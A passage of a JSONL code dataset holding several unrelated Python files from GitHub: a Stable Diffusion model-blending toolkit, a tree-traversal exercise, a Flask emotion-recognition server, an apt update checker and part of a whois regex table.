CLIPTextModel\r\nimport json\r\nimport piexif\r\nimport copy\r\ntorch.backends.cuda.matmul.allow_tf32 = True\r\n\r\n# {\r\n# 'vae': '.ARTMAN_HUGE_144000',\r\n# 'textEncoder':'.ARTMAN_HUGE_144000',\r\n# 'models':[{'name':'.ARTMAN_HUGE_144000','factor':0.5},]\r\n# }\r\n\r\n\r\nclass DiffusionCreator:\r\n def __init__(self, modelWeightRoot='.',\r\n modelCfgDict=[\r\n {'name': 'runwayml/stable-diffusion-v1-5', 'factor': 1}],\r\n defaultDType=torch.float16,\r\n useXformers=False,\r\n loadMode='blend') -> None:\r\n self.modelWeightRoot = modelWeightRoot\r\n self.modelCfgDict = modelCfgDict\r\n self.defaultDType = defaultDType\r\n self.useXformers = useXformers\r\n self.randGenerator = torch.Generator()\r\n self.blendMetaInfoDict = {}\r\n self.loadModel()\r\n\r\n def parseModelPath(self, modelPath, modelWeightRoot):\r\n if modelPath[0] == '.':\r\n modelPath = os.path.join(\r\n modelWeightRoot, modelPath[1:])\r\n return modelPath\r\n\r\n def loadModel(self):\r\n self.loadMultiModel(self.modelCfgDict['models'])\r\n baseModelName = self.modelCfgDict['models'][0]['name']\r\n tempUNet = copy.deepcopy(self.modelUNetList[baseModelName])\r\n if len(self.modelCfgDict['models']) > 1:\r\n unetWeight = self.blendModel(self.modelCfgDict['models'])\r\n tempUNet.load_state_dict(unetWeight)\r\n\r\n baseModelName = self.parseModelPath(\r\n baseModelName, self.modelWeightRoot)\r\n\r\n pipeArgDict = {}\r\n\r\n from lpw_stable_diffusion import StableDiffusionLongPromptWeightingPipeline\r\n from lpw_stable_diffusion_multi import StableDiffusionLongPromptWeightingMultiUNetPipeline\r\n\r\n if 'vae' in self.modelCfgDict.keys():\r\n vaePath = self.parseModelPath(\r\n self.modelCfgDict['vae'], self.modelWeightRoot)\r\n pipeArgDict['vae'] = AutoencoderKL.from_pretrained(\r\n vaePath, subfolder='vae', cache_dir=self.modelWeightRoot, torch_dtype=self.defaultDType)\r\n\r\n if 'textEncoder' in self.modelCfgDict.keys():\r\n textEncoderPath = self.parseModelPath(\r\n self.modelCfgDict['textEncoder'], self.modelWeightRoot)\r\n pipeArgDict['text_encoder'] = CLIPTextModel.from_pretrained(\r\n textEncoderPath, subfolder='text_encoder', cache_dir=self.modelWeightRoot, torch_dtype=self.defaultDType)\r\n pipeArgDict['tokenizer'] = CLIPTokenizer.from_pretrained(\r\n textEncoderPath, subfolder='tokenizer', cache_dir=self.modelWeightRoot)\r\n\r\n if 'multiUNet' in self.modelCfgDict.keys():\r\n self.pipe = StableDiffusionLongPromptWeightingMultiUNetPipeline.from_pretrained(\r\n baseModelName, cache_dir=self.modelWeightRoot,\r\n unet=self.modelUNetList[self.modelCfgDict['models'][0]['name']],\r\n feature_extractor=None,\r\n safety_checker=None,\r\n torch_dtype=self.defaultDType,\r\n **pipeArgDict\r\n )\r\n print('%s -> %s'%(self.modelCfgDict['models'][0]['name'],\r\n self.modelUNetList[self.modelCfgDict['models'][0]['name']].device))\r\n modelCnt=1\r\n for model in self.modelCfgDict['models'][1:]:\r\n self.modelUNetList[model['name']].enable_xformers_memory_efficient_attention()\r\n self.modelUNetList[model['name']].to('cuda:%d'%(modelCnt//2))\r\n print('%s -> %s'%(model['name'],self.modelUNetList[model['name']].device)) \r\n modelCnt = modelCnt+1\r\n self.pipe.appendExtraUNet(self.modelUNetList[model['name']])\r\n else:\r\n self.pipe = StableDiffusionLongPromptWeightingPipeline.from_pretrained(\r\n baseModelName, cache_dir=self.modelWeightRoot,\r\n unet=tempUNet,\r\n feature_extractor=None,\r\n safety_checker=None,\r\n torch_dtype=self.defaultDType,\r\n **pipeArgDict\r\n )\r\n\r\n if 'scheduler' in self.modelCfgDict.keys():\r\n if self.modelCfgDict['scheduler'] == 'DDIMScheduler':\r\n self.pipe.scheduler = DDIMScheduler(\r\n **{\r\n \"beta_end\": 0.012,\r\n \"beta_schedule\": \"scaled_linear\",\r\n \"beta_start\": 0.00085,\r\n \"clip_sample\": False,\r\n \"num_train_timesteps\": 1000,\r\n \"prediction_type\": \"epsilon\",\r\n \"set_alpha_to_one\": False,\r\n \"steps_offset\": 1,\r\n }\r\n )\r\n else:\r\n scheduer = getattr(diffusers, self.modelCfgDict['scheduler'])\r\n self.pipe.scheduler = scheduer.from_config(\r\n self.pipe.scheduler.config)\r\n\r\n if self.useXformers:\r\n self.pipe.enable_xformers_memory_efficient_attention()\r\n\r\n def loadMultiModel(self, blendParamDictList):\r\n self.modelUNetList = {}\r\n for blendParamDict in blendParamDictList:\r\n modelNameRaw = blendParamDict['name']\r\n if modelNameRaw[0] == '.':\r\n modelName = os.path.join(\r\n self.modelWeightRoot, modelNameRaw[1:], 'unet')\r\n else:\r\n modelName = modelNameRaw\r\n\r\n unet = UNet2DConditionModel.from_pretrained(\r\n modelName,\r\n subfolder='unet',\r\n cache_dir=self.modelWeightRoot,\r\n torch_dtype=self.defaultDType)\r\n\r\n self.modelUNetList[modelNameRaw] = unet\r\n\r\n def blendModel(self, blendParamDictList, blendMode='weightMix'):\r\n firstModelParamDict = blendParamDictList[0]\r\n firstModelName = firstModelParamDict['name']\r\n firstModelFactor = firstModelParamDict['factor']\r\n firstModelWeightKeys = self.modelUNetList[firstModelName].state_dict(\r\n ).keys()\r\n\r\n tempStateDict = {}\r\n blendMetaInfoDict = {\r\n 'mode': blendMode,\r\n 'param': None\r\n }\r\n\r\n if blendMode == 'randLayer':\r\n tempStateChoosenDict = {}\r\n for weightKey in firstModelWeightKeys:\r\n randomIndex = random.randint(0, len(blendParamDictList)-1)\r\n choosenModelParamDict = blendParamDictList[randomIndex]\r\n choosenModelName = choosenModelParamDict['name']\r\n tempStateDict[weightKey] = self.modelUNetList[choosenModelName].state_dict()[\r\n weightKey]\r\n tempStateChoosenDict[weightKey] = randomIndex\r\n blendMetaInfoDict['param'] = tempStateChoosenDict\r\n elif blendMode == 'weightMix':\r\n modelIdx = 0\r\n factorDict = {modelIdx: firstModelFactor}\r\n for weightKey, weightTensor in self.modelUNetList[firstModelName].state_dict().items():\r\n tempStateDict[weightKey] = weightTensor*firstModelFactor\r\n\r\n for modelParamDict in blendParamDictList[1:]:\r\n modelName = modelParamDict['name']\r\n modelFactor = modelParamDict['factor']\r\n modelIdx += 1\r\n factorDict[modelIdx] = modelFactor\r\n for weightKey, weightTensor in tempStateDict.items():\r\n tempStateDict[weightKey] += self.modelUNetList[modelName].state_dict()[\r\n weightKey]*modelFactor\r\n\r\n blendMetaInfoDict['param'] = factorDict\r\n\r\n self.blendMetaInfoDict = blendMetaInfoDict\r\n\r\n return tempStateDict\r\n\r\n def blendInRuntime(self, blendParamDictList, blendMode='weightMix'):\r\n self.pipe.unet.load_state_dict(\r\n self.blendModel(blendParamDictList, blendMode))\r\n\r\n def getExif(self, jsonDict):\r\n # https://stackoverflow.com/questions/52729428/how-to-write-custom-metadata-into-jpeg-with-python/63400376#63400376\r\n data = json.dumps(jsonDict).encode(encoding='utf8')\r\n exif_ifd = {piexif.ExifIFD.MakerNote: data}\r\n\r\n exif_dict = {\"0th\": {}, \"Exif\": exif_ifd, \"1st\": {},\r\n \"thumbnail\": None, \"GPS\": {}}\r\n exif_dat = piexif.dump(exif_dict)\r\n return exif_dat\r\n\r\n def generate(self, prompt,\r\n outputDir='./imgs',\r\n seed=None, usePromptAsSubDir=False,\r\n returnPILImage=False,\r\n extraArgDict={}):\r\n if seed is None:\r\n seed = self.randGenerator.seed()\r\n self.randGenerator.manual_seed(seed)\r\n else:\r\n self.randGenerator.manual_seed(seed)\r\n\r\n if 'prompt' in extraArgDict.keys():\r\n prompt = extraArgDict['prompt']\r\n genMetaInfoDict = {\r\n 'seed': seed,\r\n 'prompt': prompt,\r\n 'model': self.modelCfgDict,\r\n 'blendMetaInfo': self.blendMetaInfoDict\r\n }\r\n\r\n argDict = {\r\n 'prompt': prompt,\r\n 'height': 512,\r\n 'width': 512,\r\n 'num_inference_steps': 50,\r\n 'guidance_scale': 7.5,\r\n 'max_embeddings_multiples': 3,\r\n }\r\n\r\n argDict.update(extraArgDict)\r\n genMetaInfoDict.update(argDict)\r\n\r\n if not returnPILImage:\r\n if usePromptAsSubDir:\r\n if 'originalPrompt' in argDict.keys():\r\n prompt = argDict['originalPrompt']\r\n else:\r\n prompt = argDict['prompt']\r\n outputDir = os.path.join(\r\n outputDir, os.path.normpath(prompt))\r\n\r\n if not os.path.exists(outputDir):\r\n os.makedirs(outputDir)\r\n\r\n if 'originalPrompt' in argDict.keys():\r\n del argDict['originalPrompt']\r\n\r\n image = self.pipe(generator=self.randGenerator,\r\n **argDict\r\n ).images[0]\r\n\r\n exifGenMetaInfoDict = genMetaInfoDict\r\n if 'image' in exifGenMetaInfoDict.keys():\r\n del exifGenMetaInfoDict['image']\r\n\r\n if returnPILImage:\r\n return image\r\n else:\r\n exif_dat = self.getExif(exifGenMetaInfoDict)\r\n image.save(os.path.join(outputDir, '%d.jpg' %\r\n seed), quality=90, exif=exif_dat)\r\n\r\n def to(self, device):\r\n self.pipe.to(device)\r\n self.randGenerator = torch.Generator(device=device)\r\n\r\n\r\n# example\r\n# from Creator import DiffusionCreator,RandomArtistGenerator,RandomImageSizeGenerator,PromptGenerator\r\n# import torch\r\n\r\n# if __name__ == \"__main__\":\r\n# modelCfgDict = ({'name': 'runwayml/stable-diffusion-v1-5', 'factor': 0.4},\r\n# {'name': 'Linaqruf/anything-v3.0', 'factor': 0.6})\r\n# creator = DiffusionCreator(modelWeightRoot=r'../StableDiffusionWeight',\r\n# modelCfgDict=modelCfgDict, # To use local weight you should start with \".\"\r\n# defaultDType=torch.float16,\r\n# useXformers=True)\r\n\r\n# creator.to('cuda')\r\n# artistGen = RandomArtistGenerator()\r\n# sizeGen = RandomImageSizeGenerator(sizeSet='big')\r\n# promptGen = PromptGenerator(\r\n# [\r\n# 'illustration of beautiful huge dahlia garden'\r\n# ],\r\n# negativePrompt=None,#'closed eyes,slanted eyes,ugly,Polydactyly,handicapped,extra fingers,fused fingers,poorly drawn hands,extra legs,one leg,woman underwear,low quality,low res,blurry,draft,text,watermark,signature,two heads,mutated hands,mutation,deformed, bad anatomy, bad proportions,too many fingers,morbid, mutilated, extra limbs,disfigured,missing arms,missing legs,extra arms,malformed limbs',\r\n# artistGenerator=RandomArtistGenerator()\r\n# )\r\n\r\n# while True:\r\n# randomSize = sizeGen.getSize()\r\n# randomArtist = artistGen.getArtist()\r\n\r\n# genArgDict = {\r\n# 'height': randomSize[0],\r\n# 'width': randomSize[1],\r\n# 'num_inference_steps': 60,\r\n# 'guidance_scale': 7.5\r\n# }\r\n# genArgDict.update(promptGen.getPrompt())\r\n# creator.generate(\r\n# '', extraArgDict=genArgDict)\r\n","repo_name":"eeyrw/DiffusionCreatorToolkit","sub_path":"Creator.py","file_name":"Creator.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"38223512426","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n\n @ Author : Max_Pengjb\n @ date : 2018/9/23 22:37\n @ IDE : PyCharm\n @ GitHub : https://github.com/JackyPJB\n @ Contact : pengjianbiao@hotmail.com\n-------------------------------------------------\n Description : \n-------------------------------------------------\n\"\"\"\n\n__author__ = 'Max_Pengjb'\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef lrd(root):\n ls = []\n ans = []\n pre = None\n while root or len(ls) > 0:\n if root:\n ls.append(root)\n root = root.left\n else:\n root = ls[-1]\n if root.right and root.right != pre:\n root = root.right\n else:\n ls.pop()\n ans.append(root.val)\n pre = root\n root = None\n return ans\n\n\n","repo_name":"Max-PJB/python-learning","sub_path":"stack_queue/lrd_Postorder_Traversal.py","file_name":"lrd_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"36944516779","text":"from flask import Flask, render_template, Response, redirect, url_for, jsonify\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nimport uuid\nfrom keras.preprocessing.image import img_to_array\nimport imutils\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport json\nimport base64\nfrom io import StringIO\nfrom flask_uuid import FlaskUUID\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\nFeelingList = []\n\n\n@socketio.on(\"my event\")\ndef handle_my_custom_event(data):\n data = json.dumps(data)\n data = json.loads(data)\n # print(data)\n strB64 = data[\"data\"]\n\n # print(\"strB64\", strB64)\n # test camera video\n fh = open(\"test-data.mp4\", \"wb\")\n fh.write(base64.b64decode(strB64))\n fh.close()\n\n #************Model**********************#\n # parameters for loading data and images\n detection_model_path = 'haarcascade/haarcascade_frontalface_default.xml'\n\n # pre-trained model\n emotion_model_path = 'pretrained_models/cnn.hdf5'\n # hyper-parameters for bounding boxes shape\n # loading models\n face_detection = cv2.CascadeClassifier(detection_model_path)\n emotion_classifier = load_model(emotion_model_path, compile=False)\n EMOTIONS = [\"angry\", \"disgust\", \"scared\", \"happy\", \"sad\", \"surprised\",\n \"neutral\"]\n try:\n camera = cv2.VideoCapture('test-data.mp4')\n except:\n print(\"khong doc duoc video!\")\n if (camera.isOpened() == False):\n print(\"Error opening video stream or file\")\n\n while (camera.isOpened()):\n ret, frame = camera.read()\n # reading the frame\n if ret == True:\n frame = imutils.resize(frame, width=800)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detection.detectMultiScale(\n gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n # canvas = np.zeros((250, 300, 3), dtype=\"uint8\")\n frameClone = frame.copy()\n if len(faces) > 0:\n faces = sorted(faces, reverse=True,\n key=lambda x: (x[2] - x[0]) * (x[3] - x[1]))[0]\n (X, Y, W, H) = faces\n\n # Extract the facial key point of the face from the grayscale image, resize it to a fixed 64x64 pixels(pre-trained model shape)\n # the facial for classification via the CNN\n facial = gray[Y:Y + H, X:X + W]\n facial = cv2.resize(facial, (64, 64))\n facial = facial.astype(\"float\") / 255.0\n facial = img_to_array(facial)\n facial = np.expand_dims(facial, axis=0)\n\n # ti le cua cam xuc\n preds = emotion_classifier.predict(facial)[0]\n # lay ra ti le cam xuc lon nhat\n emotion_probability = np.max(preds)\n # lay ra ten cua cam xuc lon nhat\n label = EMOTIONS[preds.argmax()]\n\n #socketio.emit(\"list-emotion\", {\"msg\": request.sid })\n\n id = data[\"id\"]\n global FeelingList\n\n # Kiem tra ton tai id nay trong Feeling list chua\n isIncluded = False\n for fl in FeelingList:\n # Kiem tra bang id\n if fl[\"id\"] == id:\n isIncluded = True\n # Co roi thi tang gia tri da nhan dien duoc\n fl[label] += 1\n break\n\n # Chua co thi add vao\n if(isIncluded == False):\n Feeling_add = {\"id\": id, \"angry\": 0, \"disgust\": 0, \"scared\": 0, \"happy\": 0,\n \"sad\": 0, \"surprised\": 0, \"neutral\": 0}\n Feeling_add[label] += 1\n\n FeelingList.append(Feeling_add)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\n#****************************************#\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

Connected to Face detect server is ok

\"\n\n\n@app.route('/get-list-emotion', methods=['GET'])\ndef api_all():\n return jsonify(FeelingList)\n\n\n@app.route('/reset-data', methods=['GET'])\ndef reset_data():\n global FeelingList\n FeelingList = []\n return jsonify(\"ok\")\n\n\nif __name__ == '__main__':\n socketio.run(app, host=\"127.0.0.1\", port=8080, debug=True)\n","repo_name":"nguyendinhhan98/FaceEmotionRecognitionUsingDeepLearningAndWebRTC","sub_path":"ServerAI/detect_emotion.py","file_name":"detect_emotion.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24037358958","text":"from __future__ import absolute_import\n\nimport apt\n\nfrom .base_backend import PackageManagerBase\nfrom .apt_package import AptPackage\nfrom .apt_upgrade import AptUpgrade\n\nclass AptPackageManager( PackageManagerBase ):\n def __init__(self):\n super(AptPackageManager, self).__init__()\n self.name = \"apt\"\n self.upgrades = []\n \n def getUpgrades( self ):\n cache = apt.Cache()\n cache.update()\n cache.open(None)\n cache.upgrade( dist_upgrade=True )\n upgrades = cache.get_changes()\n cache.close()\n for pkg in upgrades:\n up = AptUpgrade(pkg)\n self.setUpgradeImportant( up )\n self.upgrades.append( up )\n return self.upgrades\n \n def getStats( self ):\n stats = {\"upgrades\":0, \"downgrades\":0, \"installs\":0, \"deletions\":0, \"download_size\":0, \"installed_size\":0, \"curr_installed_size\":0 }\n for upgrade in self.upgrades:\n pkg = upgrade.pkg\n if pkg.marked_upgrade:\n stats[\"upgrades\"] += 1\n elif pkg.marked_downgrade:\n stats[\"downgrades\"] += 1\n elif pkg.marked_install:\n stats[\"installs\"] += 1\n elif pkg.marked_delete:\n stats[\"deletions\"] += 1\n if pkg.candidate != None:\n stats[\"download_size\"] += pkg.candidate.size\n stats[\"installed_size\"] += pkg.candidate.installed_size\n if pkg.installed != None:\n stats[\"curr_installed_size\"] += pkg.installed.installed_size\n return stats\n\n def setUpgradeImportant( self, up ):\n up.isImportant = self.isPackageImportant( up.package )\n","repo_name":"ObviusOwl/check_apt_updates","sub_path":"os_updates/pm_backends/apt_backend.py","file_name":"apt_backend.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74912157807","text":"# pylint: disable=C0302\nimport os\nimport logging\n\nfrom typing import (\n Dict,\n Any,\n # Callable,\n)\n\nfrom .finders import (\n newLineSplit,\n R,\n findFromToAndLookFor,\n findFromToAndLookForWithFindFirst,\n findInSplitedLookForHavingFindFirst,\n)\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\n# 2023-09-03 mboot, all _items are inherited, confirmed\n# only _ as meta domains do net end up in the database\n\n# ======================================\n# Interesting for future enhancements:\n# https://github.com/rfc1036/whois/blob/next/tld_serv_list\n# https://github.com/rfc1036/whois/blob/next/new_gtlds_list\n# seems the most up to date and maintained\n\n\ndef xStr(what: str, times: int = 1, firstMandatory: bool = True) -> str:\n # =================================================================\n # Often we want to repeat regex patterns,\n # ( typically with nameservers or status fields )\n # that becomes unreadable very fast.\n # Allow for a simplification that expands on usage and\n # allow forcing the first to be mandatory as default,\n # but overridable when needed\n\n if times < 1:\n return \"\"\n\n if firstMandatory and what[-1] == \"?\":\n return what[:-1] + (what * (times - 1))\n\n return what * times\n\n\n# =================================================================\n# The database\n# When we finally apply the regexes we use IGNORE CASE allways on all matches\n\nZZ: Dict[str, Any] = {}\n\n# ======================================\n# meta registrars start with _ are only used a s a common toll to define others\n# NOTE: _server is not inherited down stream, currently\n\nZZ[\"_privateReg\"] = {\"_privateRegistry\": True}\n\nZZ[\"_teleinfo\"] = {\"extend\": \"com\", \"_server\": \"whois.teleinfo.cn\"} # updated all downstream\n\nZZ[\"_uniregistry\"] = {\"extend\": \"com\", \"_server\": \"whois.uniregistry.net\"} # updated all downstream\n\nZZ[\"_donuts\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.donuts.co\",\n \"registrant\": R(r\"Registrant Organization:\\s?(.+)\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n} # updated all downstream\n\nZZ[\"_centralnic\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.centralnic.com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n} # updated all downstream\n\nZZ[\"_gtldKnet\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.gtld.knet.cn\",\n \"admin\": R(r\"Admin\\s*Name:\\s+(.+)\"),\n \"_test\": None,\n} # updated all downstream\n\n# ======================================\n# start of regular entries, simple domains are at the end\n\nZZ[\"com\"] = {\n \"domain_name\": R(r\"Domain Name\\s*:\\s*(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant\\s*Organi(?:s|z)ation:([^\\n]*)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"Creation Date:[ \\t]*([^\\n]*)\"),\n \"expiration_date\": R(r\"(?:Expiry|Expiration) Date:[ \\t]*([^\\n]*)\"),\n \"updated_date\": R(r\"Updated Date:[\\t ]*([^\\n]*)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n \"_test\": \"google.com\",\n}\n\n# United Kingdom - academic sub-domain\nZZ[\"ac.uk\"] = {\n \"extend\": \"uk\",\n \"domain_name\": R(r\"Domain:\\n\\s?(.+)\"),\n \"owner\": R(r\"Domain Owner:\\n\\s?(.+)\"),\n \"registrar\": R(r\"Registered By:\\n\\s?(.+)\"),\n \"registrant\": R(r\"Registered Contact:\\n\\s*(.+)\"),\n \"expiration_date\": R(r\"Renewal date:\\n\\s*(.+)\"),\n \"updated_date\": R(r\"Entry updated:\\n\\s*(.+)\"),\n \"creation_date\": R(r\"Entry created:\\n\\s?(.+)\"),\n \"name_servers\": R(r\"Servers:\\s*(.+)\\t\\n\\s*(.+)\\t\\n\"),\n \"_test\": \"imperial.ac.uk\",\n}\n\nZZ[\"co.uk\"] = {\n \"extend\": \"uk\",\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Registration status:\\s*(.+)\"),\n \"creation_date\": R(r\"Registered on:(.+)\"),\n \"expiration_date\": R(r\"Expiry date:(.+)\"),\n \"updated_date\": R(r\"Last updated:(.+)\"),\n \"owner\": R(r\"Domain Owner:\\s+(.+)\"),\n \"registrant\": R(r\"Registrant:\\n\\s+(.+)\"),\n \"_test\": \"livedns.co.uk\",\n}\n\n# Armenia\nZZ[\"am\"] = {\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"_server\": \"whois.amnic.net\",\n \"status\": R(r\"Status:\\s(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"registrant\": R(r\"Registrant:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant:\\n.+\\n.+\\n.+\\n\\s+(.+)\"),\n \"creation_date\": R(r\"Registered:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s+(.+)\"),\n \"updated_date\": R(r\"Last modified:\\s+(.+)\"),\n \"name_servers\": R(r\"DNS servers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 4)),\n \"_test\": \"amnic.net\",\n}\n\n# Amsterdam\nZZ[\"amsterdam\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.amsterdam\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": \"nic.amsterdam\",\n}\n\n# Argentina\nZZ[\"ar\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.ar\",\n \"domain_name\": R(r\"domain\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ar\",\n}\n\n# Austria\nZZ[\"at\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.at\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n extract=r\"organization:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n extract=r\"country:\\s*([^\\n]*)\\n\",\n ),\n \"_test\": \"nic.at\",\n \"_split\": newLineSplit(),\n}\n\nZZ[\"ax\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.ax\",\n \"domain_name\": R(r\"domain\\.+:\\s*(\\S+)\"),\n \"registrar\": R(r\"registrar\\.+:\\s*(.+)\"),\n \"creation_date\": R(r\"created\\.+:\\s*(\\S+)\"),\n \"expiration_date\": R(r\"expires\\.+:\\s*(\\S+)\"),\n \"updated_date\": R(r\"modified\\.+:\\s?(\\S+)\"),\n \"name_servers\": R(r\"nserver\\.+:\\s*(\\S+)\"),\n \"status\": R(r\"status\\.+:\\s*(\\S+)\"),\n \"registrant\": R(r\"Holder\\s+name\\.+:\\s*(.+)\\r?\\n\"), # not always present see meta.ax and google.ax\n \"registrant_country\": R(r\"country\\.+:\\s*(.+)\\r?\\n\"), # not always present see meta.ax and google.ax\n}\n\nZZ[\"bank\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n}\n\nZZ[\"be\"] = {\n \"extend\": \"pl\",\n \"domain_name\": R(r\"\\nDomain:\\s*(.+)\"),\n \"registrar\": R(r\"Company Name:\\n?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s*(.+)\\n\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameservers:(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?\\n\\n\"),\n}\n\nZZ[\"biz\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s?(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": None,\n}\n\nZZ[\"br\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.registro.br\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(\"nic.br\"),\n \"registrant\": None,\n \"owner\": R(r\"owner:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n \"_test\": \"registro.br\",\n}\n\nZZ[\"by\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"registrant\": R(r\"Org:\\s*(.+)\"),\n \"registrant_country\": R(r\"Country:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s*(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s*(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\\n\"),\n}\n\n# Brittany (French Territory)\nZZ[\"bzh\"] = {\n \"extend\": \"fr\",\n \"_server\": \"whois.nic.bzh\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s*(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s*(.*)\"),\n \"creation_date\": R(r\"Creation Date:\\s*(.*)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s*(.*)\"),\n \"updated_date\": R(r\"Updated Date:\\s*(.*)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.*)\"),\n \"status\": R(r\"Domain Status:\\s*(.*)\"),\n \"_test\": \"pik.bzh\",\n}\n\nZZ[\"cc\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation 